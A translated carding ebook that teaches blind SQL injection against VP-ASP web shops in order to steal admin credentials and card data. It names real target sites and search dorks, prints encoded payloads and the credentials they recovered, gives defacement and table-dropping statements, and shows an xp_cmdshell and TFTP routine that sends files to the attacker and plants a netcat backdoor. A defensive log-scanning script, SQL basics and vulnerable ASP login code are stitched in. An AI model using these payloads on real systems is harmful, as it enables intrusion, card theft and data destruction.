E Book Hacking Creditcard Version 2
The most noteworthy tutorial in this ebook. Hacking Credit Card SQL Blind V.1 (Powered by Tieuquainho)
There is an article in Ebook Hacking Credit Card version 1 with the same hacking method as this one, but this seems to be the most complete write-up. A brief introduction to SQL Blind: it is a form of exploitation based on a security hole in MSSQL; using this hole we apply exploit strings and find information in the server's database. SQL Blind is a style of exploitation that probes one character at a time. When most of the other SQL hacking techniques you try do not succeed, SQL Blind may be where you break through the deadlock. However, the good side always comes with a bad side: blind SQL querying takes a great deal of time and effort, because you have to find each character of the string you are looking for one by one. For example, to find the admin link you must find each letter of the admin link string in the database and join them into one string. Talking too much will only confuse you, so let's get to work to make it easy to understand.

Preparation:
- Web browser: Opera, Mozilla Firefox v1.3 or another kind; Internet Explorer is ok too. You should not use Internet Explorer for hacking (^|^)
- 1 glass of water and 1 face towel for putting out fires & wiping off sweat.

Targets:
- All versions of VP-ASP from 5.0 back (a kind of shop with quite a few bugs and plenty of good CCs (^|^))
- To find these VP-ASP shops, refer to the keywords below for searching on Google, Yahoo or any search site.
- Keywords:
  + shopdisplayproducts.asp?id
  + shopaddtocart.asp?catalogid=
- I only give 2 keywords because they are the main markers that let a search page find VP-ASP.
Let's start hacking a demo site. The target is hxxps://circleathletics.com/ (uses VP-ASP V5.0)
- First we find this site's admin link:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')
Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139
So this means the letter we supplied (a) is not the first character of the admin link string. It occurs to us that the admin link is usually shopadmin.asp, so in the following command we replace a with s:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')
Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int. /shop/shop$db.asp, line 409
- Exactly: the letter S is the first character of the admin link. We continue trying other letters for the next position:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh')
- Note this part: (fieldvalue,2)='sh')
- Keep substituting to find the admin link.
The admin link ends in .asp, so there is no need to find out how many characters the string has. Next we find the admin user + password:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a')
Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139
Nothing at all; continue like this:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c')
Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409
It showed the whole user at once; this site has a serious bug. On other sites, rack your brains a bit like when finding the admin link and it's ok, hihi:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,2)='ab')
This is the way to find the 2nd character; for the 3rd, add (fldusername,3)='abc') and so on. We have the admin user above, circ54; now find its password:
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='a')
Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='2')
Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409
So this one has been hacked, hihi, too easy right? I hope you understand; I write clumsily, so please bear with me. Here are some additional references:
**************** Find admin link ***************************************
%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== first character
%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15) <=== find the number of characters

**************** Find user ***********************************************
%20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== first character
%20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== find the 2nd letter; for the 3rd replace with 3 and keep probing
%20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== number of characters of the user
%20or 1=(select fldusername from tbluser where left(fldusername,1)='a') <== when not superAdmin

**************** Find pass ************************************************
%20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== first character
%20or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== number of characters
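The probing sequence described in the tutorial above leaves a recognisable trail in a web server's access log: the same client, the same page, the same parameter, a `select` subquery with `left(` or `len(` slicing, one request per guessed character, and a 5xx error page each time. The following is an added example (not code from the ebook or from VP-ASP) that scans constructed IIS-style log lines for that pattern and for non-integer values in parameters the shop treats as integers; the log layout, the `INTEGER_PARAMS` set and the probe threshold are assumptions.

```python
"""Spot character-by-character blind SQL injection probes in web access logs.

Added example, not code from the ebook or from VP-ASP. The log lines below
are constructed in a simplified IIS-style layout
(<client-ip> <method> <path> <query-string> <status>), not captured traffic.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: one client walks the 'xadminpage' value one letter at a
# time (the probes shown in the tutorial); the other two requests are normal.
SAMPLE_LOG = """\
10.0.0.5 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') 500
10.0.0.5 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s') 500
10.0.0.5 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh') 500
10.0.0.9 GET /shop/shopaddtocart.asp catalogid=6 200
10.0.0.9 GET /shop/shopdisplayproducts.asp id=12 200
"""

# Parameters the shop treats as integers (assumption about the application).
INTEGER_PARAMS = {"catalogid", "id"}

# A subquery plus a string-slicing function is the signature of the
# one-character-at-a-time probing described in the tutorial.
SUBQUERY = re.compile(r"\b(select|union)\b", re.I)
SLICER = re.compile(r"\b(left|right|substring|ascii|len)\s*\(", re.I)


def parse_line(line):
    """Split one constructed log line into fields; query values are URL-decoded."""
    ip, method, path, query, status = line.split()
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key.lower()] = unquote_plus(value)
    return {"ip": ip, "method": method, "path": path,
            "params": params, "status": int(status)}


def classify(params):
    """Return {param: reason} for every parameter value that looks like a probe."""
    hits = {}
    for key, value in params.items():
        if SUBQUERY.search(value) and SLICER.search(value):
            hits[key] = "blind-sqli probe"
        elif key in INTEGER_PARAMS and not value.isdigit():
            hits[key] = "non-integer value in integer parameter"
    return hits


def scan(log_text, threshold=2):
    """Count probes per (client, path, parameter); keep those at or above threshold.

    Repeated probes against one parameter from one client are the tell: one
    malformed request can be noise, a run of them is enumeration.
    """
    counts = defaultdict(int)
    errors = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        for key in classify(rec["params"]):
            slot = (rec["ip"], rec["path"], key)
            counts[slot] += 1
            if rec["status"] >= 500:
                errors[slot] += 1
    return {slot: {"probes": n, "server_errors": errors[slot]}
            for slot, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for (ip, path, key), info in scan(SAMPLE_LOG).items():
        print(f"{ip} {path} param={key} probes={info['probes']} 5xx={info['server_errors']}")
```

Run on the constructed sample it reports one finding: client 10.0.0.5 sent 3 probes against `catalogid` on shopaddtocart.asp, all answered with a 5xx. Those verbose error pages (the Type mismatch and Syntax error responses quoted above) are what make the technique work, so the application-side fix is to validate integer parameters before they reach the query and to return a generic error page.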
fldpassword='" & userpassword & "'"
Set rs = myconn.Execute(SQL)
if not rs.eof then
  CheckSecondpassword rc
  If rc=0 then
    GetAdminData rs
  else
    closerecordset rs
    shopclosedatabase myconn
    msg=Secondpasswordmsg & "<br>"
  end if
else
  rs.close
  set rs=nothing
  LocateSupplier
end if
if msg="" then
  msg=LangAdmin01 & "<br>"
end if
Shopclosedatabase myconn
else
  msg=LangAdmin01 & "<br>"
  Shopclosedatabase myconn
end if
end if
AdminPageHeader
if msg <> "" Then
  response.write getconfig("xfont") & msg & "</font>"
end if
%>
<form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm">
<center><font face=arial size=2 color="#0080C0"><b><%=LangAdmin02%></b></font></center><br>
<TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0 align="center" bordercolordark="#333399" bordercolorlight="#666699">
<TR>
<TD BGCOLOR="#0080C0" COLSPAN=2 ALIGN=LEFT VALIGN=TOP>
<font face="Arial, Helvetica" SIZE=2 color=white><B><%=LangAdmin03%></B></FONT></TD>
</TR>
<TR>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminUserName%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP>
<font face="Arial, Helvetica"><INPUT TYPE=TEXT NAME="UserName" VALUE="<%=Request("UserName") %>"></font></TD>
</TR>
<TR>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password"></font></td></TR>
<% If Secondpassword<>"" then %>
<tr>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword & "2"%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password2"></font></td></TR>
<%end if %>
<tr>
<td></td>
<td><font face="Arial, Helvetica"><INPUT TYPE=SUBMIT VALUE="<%=LangAdminLogin%>" name="Submit"></font></TD>
</tr>
</TABLE>
</form>
</center>
</BODY>
</HTML>
<%
Sub GetAdminData (rs)
  setsess "shopadmin" ,rs("fldusername")
  if isnull(rs("Admintype")) then
    SetSess "admintype","SUPER"
  else
    setsess "admintype",ucase(rs("admintype"))
  end if
  setsess "login" , rs("fldusername")
  setsess "usertables",rs("tablesallowed")
  setsess "adminmenus",rs("fldaccess")
  rs.close
  set rs=nothing
  LogUser GetSess("ShopAdmin"), "in", myconn
  SetSess("Supplierid"),""
  Shopclosedatabase myconn
  CheckSecurity (userpassword)
  Response.redirect "shopadmin1.asp"
end sub

Sub LocateSupplier
  If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub
  sql = "select * from suppliers where supplieruserid='" & username & "' and supplierpassword='" & userpassword & "'"
  Set rs = myconn.Execute(SQL)
  If err.number>0 then
    msg="database Open error<br>" & GetSess("Openerror")
  else
    If Not rs.EOF Then
      setsess "shopadmin" ,request("username")
      setsess "admintype","supplier"
      setsess "login" , rs("supplieruserid")
      setsess("supplierid"),rs("supplierid")
      rs.close
      set rs=nothing
      GetUserTables
      ' setsess "usertables",rs("tablesallowed")
      LogUser GetSess("ShopAdmin"), "in", myconn
      Shopclosedatabase myconn
      response.redirect "shopadmin1.asp"
    else
      rs.close
      set rs=nothing
    end if
  end if
end sub

Sub GetUserTables
  dim rs
  sql = "select * from tbluser where fldusername='supplier'"
  Set rs = myconn.Execute(SQL)
  if err.number>0 then
    msg="database Open error<br>" & GetSess("Openerror")
  else
    If Not rs.EOF Then
      setsess "usertables",rs("tablesallowed")
      setsess "adminmenus",rs("fldaccess")
    end if
  end if
  rs.close
  set rs=nothing
end sub

Sub Checksecurity (ipassword)
  dim tpassword
  tpassword=ucase(ipassword)
  if tpassword="VPASP" or tpassword="ADMIN" then
    setsess "security","Yes"
  end if
end sub

'*******************************************************************
' if using second password facility, then validate it
'*******************************************************************
Sub CheckSecondPassword(rc)
  dim password
  rc=4
  If secondpassword="" then
    rc=0
    exit sub
  end if
  password=request.form("password2")
  if password="" then exit sub
  if ucase(password)<>ucase(secondpassword) then exit sub
  rc=0
end sub
%>
Note the text in blue above: this is where the 2nd password of a VPASP shop is set. Earlier nobita reasoned that this pass 2 was fixed by VPASP and sat in the shop's database, but that is not correct. From the way this pass 2 is set, nobita thinks that creating pass 2 may be done by the webmaster editing according to VPASP's instructions. The way the password is set and where it is placed can differ, for instance:
CODE
<!--#include file="shop$db.asp"-->
<!--#include file="pass2.asp"-->
<%
where the pass2 file holds the second password, or only the path to where the second password lies inside the shop's database, whose info does not change; creating a separate table that holds pass2, for instance. Besides these basic ways of setting pass2, the methods are as varied as the webmasters' skill levels. However, recently some people have claimed there is exploit code for pass2, but in reality it is probing the database for unusual tables that are likely to hold pass2 info, for example:
CODE
affiliates
categories
configuration
coupons
customerprices
customers
dtproperties
gifts
mycompany
oitems
orders
ordertracking
prodcategories
prodfeatures
products
projects
quantitydiscounts
registrant
registryitems
reviews
searchresults
shipmethods
pass_access
suppliers
tblaccess
tbllog
tbluser
CHECK_CONSTRAINTS
COLUMN_DOMAIN_USAGE
COLUMN_PRIVILEGES
COLUMNS
CONSTRAINT_COLUMN_USAGE
CONSTRAINT_TABLE_USAGE
DOMAIN_CONSTRAINTS
DOMAINS
KEY_COLUMN_USAGE
REFERENTIAL_CONSTRAINTS
And this way of searching takes a lot of effort, because you have to find all of its tables, and with the current style of hacking that means guessing table names, or blind-probing the table name one character at a time. You can sit a whole day and not finish one shop. However, to date nobita has not found any better solution for this kind. Hopefully this article will help you find pass2 more easily.
Post by hieupc:
From hieupc's experience, to hack the 2nd password of a shop (Secure Pass) the only fast and neat way is local hacking; besides local hacking you can follow nobita's experience article to get pass 2. And local hacking becomes very easy once you have a host in hand: you only need to upload a backdoor such as remview.php and you can hack. However, this requires solid knowledge of hosting and DNS. If you want to know which server the shop is on, you can check DNS or the IP to locate it, and from there register yourself a host on the same hosting as the shop whose pass 2 you want. As for how to hack locally and check DNS, or to understand hosting better, you can visit the following pages for detailed guides: http://viethacker.org , http://hvaonline.net ; and to check DNS and look up information: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com . Besides these there are many other websites; you can search on google.com. Remview.php: http://php.spb.ru/remview/remview_2003_10_23.zip Besides, there are many other web shells and backdoors you can find on google.com or through http://viethacker.org. Decode encrypted CC: http://rapidshare.de/files/8343810/decodecc.rar.html (unrar pass: thegioiebook.com)
What is SQL?
SQL stands for Structured Query Language.
SQL lets you access a database.
SQL is an ANSI standard language.
SQL can execute queries against a database.
SQL can retrieve data from a database.
SQL can insert new data into a database.
SQL can delete data from a database.
SQL can modify existing data in a database.
SQL is easy to learn :-)

SQL is a standard
SQL is an ANSI (American National Standards Institute) standard for accessing database systems. SQL statements are used to retrieve and update data in a database.
SQL works with most database programs such as MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase, etc.
Note: Most database programs that support SQL have their own extensions to SQL that only work with that program.
Database tables
A database usually consists of one or more tables. Each table is identified by a name (for example Customers or Orders). Tables contain records (rows), which are the table's data.
LastName    FirstName   Address        City
Hansen      Ola         Timoteivn 10   Sandnes
Svendson    Tove        Borgvn 23      Sandnes
Pettersen   Kari        Storgt 20      Stavanger
The table above contains 3 records (rows), each corresponding to one person, and four columns (LastName, FirstName, Address and City).
SQL queries
A query like the following:
Will return the following result:
Note: Some database systems require SQL statements to end with a semicolon (;). We will not use semicolons in this article.
SQL is the syntax for executing queries. SQL also includes syntax for updating data:
SELECT - retrieves data from a database table.
UPDATE - updates/modifies data in a table.
DELETE - deletes data from a table.
INSERT INTO - inserts new data into a table.

SQL as a Data Definition Language (DDL)
The DDL part of SQL allows creating or deleting tables. We can also define keys, indexes, specify links between tables and set up constraints between tables in the database.
CREATE TABLE - creates a new table.
ALTER TABLE - changes the structure of a table.
DROP TABLE - deletes a table.
CREATE INDEX - creates an index (search key).
DROP INDEX - deletes an index that was created.
The SELECT statement is used to retrieve data from a table. The result is returned in table form, stored in a table called the result table (also called the result set).
Syntax
Persons table:
LastName    FirstName   Address        City
Hansen      Ola         Timoteivn 10   Sandnes
Svendson    Tove        Borgvn 23      Sandnes
Pettersen   Kari        Storgt 20      Stavanger
Result:
Retrieving all columns
To retrieve all columns from the Persons table, use the * symbol in place of the column list:
Result:
Hansen      Ola         Timoteivn 10   Sandnes
Svendson    Tove        Borgvn 23      Sandnes
Pettersen   Kari        Storgt 20      Stavanger
Result set
The result returned by an SQL query is stored in a result set. Most database systems allow navigating the result set with programming functions such as Move-To-First-Record, Get-Record-Content, Move-To-Next-Record, etc.
The semicolon is the standard way to separate SQL statements if the database system allows several SQL statements to be executed in a single call.
The SQL statements in this article are all single statements (each is one and only one SQL command). MS Access and MS SQL Server do not require a semicolon right after each SQL statement, but some other database programs may force you to add a semicolon after every SQL statement (even a single one). Again, in this article we will not use semicolons at the end of SQL statements.

The WHERE clause
To retrieve data from a table according to some conditions, a WHERE clause can be added to the SELECT statement.
Syntax
Operator   Description
=          Equal
<>         Not equal
>          Greater than
<          Less than
>=         Greater than or equal
<=         Less than or equal
BETWEEN    Between a range
LIKE       Search for a pattern
To get the list of people living in the city of Sandnes, we use a WHERE clause in the SELECT statement as follows:
Persons table:
-------------------------------------------
AND and OR
The AND and OR operators join two or more conditions in a WHERE clause together.
LastName    FirstName   Address        City
Hansen      Ola         Timoteivn 10   Sandnes
Svendson    Tove        Borgvn 23      Sandnes
Svendson    Stephen     Kaivn 18       Sandnes
Example 1
Example 2
LastName    FirstName   Address        City
Svendson    Tove        Borgvn 23      Sandnes
Svendson    Stephen     Kaivn 18       Sandnes
Example 3
SELECT * FROM Persons WHERE (FirstName = 'Tove' OR FirstName = 'Stephen') AND LastName = 'Svendson'
Result:
LastName    FirstName   Address        City
Svendson    Tove        Borgvn 23      Sandnes
Svendson    Stephen     Kaivn 18       Sandnes
LastName    FirstName   Address        City        Year
Hansen      Ola         Timoteivn 10   Sandnes     1951
Svendson    Tove        Borgvn 23      Sandnes     1978
Svendson    Stale       Kaivn 18       Sandnes     1980
Pettersen   Kari        Storgt 20      Stavanger   1960
Result:
LastName    FirstName   Address        City        Year
Hansen      Ola         Timoteivn 10   Sandnes     1951
Svendson    Tove        Borgvn 23      Sandnes     1978
Svendson    Stale       Kaivn 18       Sandnes     1980
Using quotes
Note that in the example above we used two single quotes (') around the condition value 'Sandnes'.
SQL uses single quotes around text values. Many database systems also allow double quotes ("). Numeric values are not enclosed in quotes.
With numeric data:
Syntax
Using LIKE
The following SQL statement returns the list of people whose first name contains the string la:
BETWEEN retrieves a range of data lying between two values. The two values can be numbers, text or dates.
SELECT column_name FROM table_name WHERE column_name BETWEEN value_1 AND value_2
LastName    FirstName   Address        City
Hansen      Ola         Timoteivn 10   Sandnes
Nordmann    Anna        Neset 18       Sandnes
Pettersen   Kari        Storgt 20      Stavanger
Example 1
Find all people whose last name (in alphabetical order) lies between Hansen (inclusive) and Pettersen (exclusive):
Result:
LastName    FirstName   Address        City
Hansen      Ola         Timoteivn 10   Sandnes
Nordmann    Anna        Neset 18       Sandnes
Important note: The BETWEEN...AND operator returns different results on different database systems. On some systems, BETWEEN...AND returns only the rows whose values lie strictly "between" the two values (that is, values equal to either endpoint are left out). Some systems include values equal to both endpoints. Still others include only values equal to the first endpoint but not the second (as in the example above). Therefore, check the database system you are using before relying on BETWEEN...AND.
Example 2
To find people whose last name (in alphabetical order) lies outside the range of example 1, add the NOT operator:
SELECT * FROM Persons WHERE LastName NOT BETWEEN 'Hansen' AND 'Pettersen'
Result:
LastName    FirstName   Address        City
Pettersen   Kari        Storgt 20      Stavanger
Svendson    Tove        Borgvn 23      Sandnes
-------------------------------
The DISTINCT keyword
The SELECT statement returns information from the columns of a table. But what if we do not want duplicate values?
Company     OrderNumber
Sega        3412
W3Schools   2312
Trio        4678
W3Schools   6798
Will return:
Company
The company name W3Schools appears twice in the result, which is sometimes not what we want.
Will return:
--------------------------------
Sorting rows
The ORDER BY clause
is used to sort rows.
Example Orders table:
Company     OrderNumber
Sega        3412
ABC Shop    5678
W3Schools   2312
W3Schools   6798
Example:
Result:
Company     OrderNumber
ABC Shop    5678
Sega        3412
W3Schools   6798
W3Schools   2312
Example:
Get the list of companies in alphabetical (ascending) order and the order numbers in ascending numerical order:
Result:
Company     OrderNumber
ABC Shop    5678
Sega        3412
W3Schools   2312
W3Schools   6798
Example:
Result:
Company     OrderNumber
W3Schools   6798
W3Schools   2312
Sega        3412
ABC Shop    5678

The INSERT INTO statement
The INSERT INTO statement is used to insert new rows into a table.
Syntax:
Inserting a new row
LastName    FirstName   Address        City
Pettersen   Kari        Storgt 20      Stavanger
Hetland     Camilla     Hagabakka 24   Stavanger
Will produce:
LastName    FirstName   Address        City
Pettersen   Kari        Storgt 20      Stavanger
Hetland     Camilla     Hagabakka 24   Stavanger
Rasmussen               Storgt 67
Syntax:
LastName    FirstName   Address        City
Nilsen      Fred        Kirkegt 56     Stavanger
Rasmussen               Storgt 67
We get the following result:
LastName    FirstName   Address        City
Nilsen      Fred        Kirkegt 56     Stavanger
Rasmussen   Nina        Storgt 67
Now we want to change the name and address:
UPDATE Person SET Address = 'Stien 12', City = 'Stavanger' WHERE LastName = 'Rasmussen'
The result will be:
LastName    FirstName   Address        City
Nilsen      Fred        Kirkegt 56     Stavanger
Rasmussen   Nina        Stien 12       Stavanger
-------------------------
The DELETE statement
Syntax:
LastName    FirstName   Address        City
Nilsen      Fred        Kirkegt 56     Stavanger
Rasmussen   Nina        Stien 12       Stavanger
Delete a row:
Delete all rows:
Sometimes we want to delete all the data in a table but keep the table itself, with its structure and all its attributes; we can use the statement:
or
Syntax of the COUNT function:
The COUNT(*) function:
and the result will be:
the result will be:
The COUNT(column) function:
The following statement returns the number of people whose Age column is not empty:
and the result will be:
Note: The examples below only work with Oracle and MS SQL Server, not with MS Access (not tested with other database systems!)
The DISTINCT keyword and COUNT can be used together to count the number of non-duplicate results.
The syntax is:
Company     OrderNumber
Sega        3412
W3Schools   2312
Trio        4678
W3Schools   6798
will return:
Functions
Syntax:
The AVG(column) function
The AVG function returns the average value of the specified column over the selected rows. NULL values are not considered when computing the average.
Example:
The following statement computes the average age of people older than 20:
the result will be:
39.5
The MAX(column) function
Example:
result:
45
The MIN(column) function
Example:
result:
19
Note: The MIN and MAX functions can also be applied to columns holding text data. The data in the column is compared in ascending dictionary order.
The SUM(column) function
Example:
result:
98
Example:
result:
79
GROUP BY and HAVING
GROUP BY...
The GROUP BY... clause was added to SQL because aggregate functions (such as SUM) return an aggregate over the values of a column each time they are called, and without GROUP BY there is no way to compute the sum of the values for each separate group within the column.
will return:
The result above is sometimes not what we expect. We add a GROUP BY clause to the SQL statement:
and this time the result will be:
This result is exactly what we want.
HAVING...
The HAVING... clause was added to SQL because the WHERE clause cannot be applied to aggregate functions (such as SUM). Without HAVING, we could not test conditions on aggregate functions.
SELECT column_name, SUM(column_name) FROM table_name GROUP BY column_name HAVING SUM(column_name) condition value
SELECT Company, SUM(Amount) FROM Sales GROUP BY Company HAVING SUM(Amount) > 10000
will return:
Column aliases:
Table aliases:
LastName    FirstName   Address        City
Hansen      Ola         Timoteivn 10   Sandnes
Svendson    Tove        Borgvn 23      Sandnes
Pettersen   Kari        Storgt 20      Stavanger
Will return:
FOR NEWBIE
Hihi, let me continue. This post is still basics for newbies; anything more advanced is beyond me. Here I take the liberty of using Ford as the victim. The purpose of this post is to use the update, insert, drop, delete... statements in SQL to deface. Create a file with the following content:
<body>
<form method="post" action="https://www.ford.com.vn/Tuyendung/Jobs_Search_Action.asp" name="frmSearch" onsubmit="return CheckSubmit();">
TIM KIEM <input name="txtSearch" size="40" class="clsText" type="text" size=2> </br>
DIA DIEM <input type="text" name="SLocation" class="clsText" value="22"></br>
JOB <input type="text" name="SJobCategory" class="clsText" value=""> </br>
<input type=submit value="tim kiem"></br>
</form>
</body>
Save it as the file xx.html, then run it as follows:
TIM KIEM: xxx
DIA DIEM: 22
JOB: 1' SQL command --
Likewise for its news page https://www.ford.com.vn/News/News.asp; here I choose to deface the subject with messageid=146. OK, these are the statements you need to know:
Insert into user ("id","pas") values (1,"xxx")-- /* add a user xxx to the user table */
update user set pass="xxxx" where id=1-- /* change the password of the user with id=1 */
drop table user-- /* dangerous, deletes the user table */
drop database db-- /* very dangerous */
delete from user where id=1-- /* delete column */
..............
Here I use update
QUOTE
TIM KIEM: xxx
DIA DIEM: 22
If you receive a message like this instead of an SQL error message, then you have succeeded:
QUOTE
Khng tm c theo yu cu ca bn!
1) Success rate 80%: Condition: the server must be WinNT and the user used for the injection must be one with rights to use xp_cmdshell (sa, dbo). To check, you can do the following on the injection link: [injection link] %2b convert (int,(system_user()) If the result is sa or dbo, you can probably attack. If you have sa or dbo but the admin has disallowed use of cmdshell, turn it on (how to turn it on, find out yourself). Note: you will only be able to hack into the server that holds its database (often the database is put on the same host). Required tools: <-- find and download yourself
tftpd32, backdoor +++ Some hacking experience, knowledge of DOS commands and a bit of understanding of networking
2) Step-by-step approach
a) Concepts: Note: This hacking method of mine is not the most general one, because there are many other ways; my method hacks through the TFTP protocol.
A bit about the TFTP protocol: it is a server<->client file transfer protocol. It works similarly to FTP but is much simpler, over port 69, and one advantage: it needs no password (this is the important point for our hacking).
In DOS type tftp /? -> you will get its syntax as follows: TFTP [-i] host PUT || GET filename [location to send the file to] -i: if you need to transfer a binary file, use it. host: IP of the server machine. PUT: if you want to send a file. GET: if you want to get a file. Example of a tftp command: Tftp -i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe will take the file netcat.exe on the server machine (the machine with IP xxx.) and transfer it to C:\nc.exe on the client machine (the machine typing the command above).
Now we test directly on localhost. Open tftpd32 to turn your machine into a tftp server (note: all firewalls must be turned off for the protocol to work properly). In tftpd32 there is a BASE directory, by default [path to]\tftpd32e; it is the directory where your uploaded or downloaded files are placed when exchanging files with a client (since you are the server) (you can change it if you like). In this post I use [link] in place of the link you inject; adjust it accordingly to run exec (add (), ( if needed).
And <IP> stands for your IP (it is shown when you open tftpd32). The actual attack:
-------------------------------BEGIN---------------------------------
Command 1: RUN DOS COMMAND on the victim machine:
Command 2: DOWNLOAD FILE from the victim machine: [link] exec master..xp_cmdshell tftp <IP> PUT [path][filetodownload]
Example: Get the victim's IP: (1)[link] exec master..xp_cmdshell ipconfig > a.txt (2)[link] exec master..xp_cmdshell tftp <IP> PUT a.txt ---- Explanation: (1): runs the command ipconfig >a.txt <=> creates the file a.txt whose content is the output of ipconfig (2): runs tftp <IP> PUT a.txt <=> transfers the just-created a.txt --> server (our machine)
Command 3: UPLOAD BACKDOOR to the victim machine: [link] exec master..xp_cmdshell tftp [-i] <IP> GET backdoor [path where the backdoor should be placed]
Example: upload netcat into C:\WINNT: [link] exec master..xp_cmdshell tftp -i <IP> GET nc.exe C:\WINNT\nx.exe
----------------------------------END------------------------------
3) Conclusion:
So now we know how to run commands (you can run exe files), how to download and upload files; we have practically mastered the server. Whether the hack is fast or slow, and how effective it is, is up to you (If you find any errors while testing, please contact http://shacker.computed.net/baivet/nangcao/windak88@yahoo.com ) Happy hacking
The SQL problem:
The query becomes: select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith' When the query above is processed it generates the error:
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'hn'.
The reason is that we slipped in a single quote "'" and the input value became 'hn', which is wrong relative to the database, so an error is generated. Exploiting this, an attacker can delete your data as follows:
Forename: jo'; drop table authors-- The authors table is deleted -> dangerous, isn't it?
<HTML>
<HEAD>
<TITLE>Login Page</TITLE>
</HEAD>
<BODY bgcolor='000000' text='cccccc'>
<FONT Face='tahoma' color='cccccc'>
<CENTER><H1>Login</H1>
<FORM action='process_login.asp' method=post>
<TABLE>
<TR><TD>Username:</TD><TD><INPUT type=text name=username size=100% width=100></INPUT></TD></TR>
<TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR>
</TABLE>
<INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'>
</FORM>
</FONT>
</BODY>
</HTML>
Here is the code of 'process_login.asp':
<HTML>
<BODY bgcolor='000000' text='ffffff'>
<FONT Face='tahoma' color='ffffff'>
<STYLE>
p { font-size=20pt ! important}
font { font-size=20pt ! important}
h1 { font-size=64pt ! important}
</STYLE>
<%@LANGUAGE = JScript %>
<%
function trace( str )
{
  if( Request.form("debug") == "true" )
    Response.write( str );
}

function Login( cn )
{
  var username;
  var password;
  username = Request.form("username");
  password = Request.form("password");
  var rso = Server.CreateObject("ADODB.Recordset");
  // the query is built by string concatenation: user input becomes part of the SQL text
  var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
  trace( "query: " + sql );
  rso.open( sql, cn );
  if (rso.EOF)
  {
    rso.close();
%>
<FONT Face='tahoma' color='cc0000'>
<H1>
<BR><BR>
<CENTER>ACCESS DENIED</CENTER>
</H1>
</BODY>
</HTML>
<%
    Response.end
    return;
  }
  else
  {
    Session("username") = "" + rso("username");
%>
<FONT Face='tahoma' color='00cc00'>
<H1>
<CENTER>ACCESS GRANTED<BR>
<BR>
Welcome,
